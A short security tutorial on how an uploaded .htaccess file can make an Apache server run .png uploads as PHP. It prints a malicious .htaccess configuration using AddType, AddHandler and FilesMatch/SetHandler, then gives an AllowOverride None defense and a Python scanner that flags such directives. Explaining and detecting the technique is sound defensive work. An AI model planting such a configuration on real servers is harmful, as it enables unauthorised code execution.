This article is only for the purpose of learning network information defense
Distributed Configuration File
When a distributed configuration file (.htaccess) is present in a directory, its directives override the global httpd.conf configuration for that directory and its subdirectories.
Attack
If a file upload feature allows a .htaccess file to be uploaded, the uploader can force changes to the Apache server's configuration.
Malicious Configuration
.htaccess
    # Treat .png files as .php files
    ## Attack method: Upload a .png file with PHP code content
    AddType application/x-httpd-php .png
    # Treat files whose name contains the php extension as .php files
    ## Attack method: Upload an image file with the file name containing the PHP keyword <filename>.php.png
    AddHandler php5-script php
    # Match a specified file name and treat it as a .php file
    ## Attack method: Upload an image file with the specified file name <filename>.png
    <FilesMatch "<filename>.png">
        SetHandler application/x-httpd-php
    </FilesMatch>
Defense
Set AllowOverride to None in the Apache configuration file so that .htaccess files are ignored, and do not allow files in the Apache root directory to be overwritten.
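To check whether such a file has already been planted, the added example below (not part of the original article) walks a web root and reports every .htaccess directive that remaps files to PHP. The function names, the "php" match heuristic and the sample tree are assumptions constructed for illustration.

```python
import os
import re
import tempfile

REMAP = {"addtype", "addhandler", "sethandler", "forcetype"}  # handler/MIME remapping
PHP_VALUE = re.compile(r"php", re.IGNORECASE)  # heuristic chosen for this example

def parse_directives(text):
    """Yield (line_no, directive, args), skipping comments and section tags."""
    logical, start = "", 0
    for no, raw in enumerate(text.splitlines(), 1):
        start = start if logical else no
        line = raw.strip()
        if line.endswith("\\"):  # Apache joins backslash-continued lines
            logical += line[:-1] + " "
            continue
        logical, done = "", logical + line
        if done and not done.startswith(("#", "<")):
            parts = done.split(None, 1)
            yield start, parts[0].lower(), parts[1] if len(parts) > 1 else ""

def scan_tree(root):
    """Return sorted findings for .htaccess files under root that remap to PHP."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if fname.lower() != ".htaccess":  # also catches case variants
                continue
            path = os.path.join(dirpath, fname)
            with open(path, encoding="utf-8", errors="replace") as fh:
                for no, name, args in parse_directives(fh.read()):
                    if name in REMAP and PHP_VALUE.search(args):
                        findings.append((os.path.relpath(path, root), no, name, args))
    return sorted(findings)

def demo():
    samples = {  # constructed sample files, not taken from a real server
        "uploads/.htaccess": "# planted file\nAddType application/x-httpd-php .png\n",
        "uploads/a/.htaccess": "<FilesMatch \"x.png\">\n  SetHandler \\\n  application/x-httpd-php\n</FilesMatch>\n",
        "static/.htaccess": "Options -Indexes\n",
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in samples.items():
            os.makedirs(os.path.dirname(os.path.join(root, rel)), exist_ok=True)
            with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_tree(root)

if __name__ == "__main__": print(*demo(), sep="\n")
```

Any finding inside a directory that accepts uploads is worth investigating, since with AllowOverride None in effect no legitimate .htaccess file is needed there.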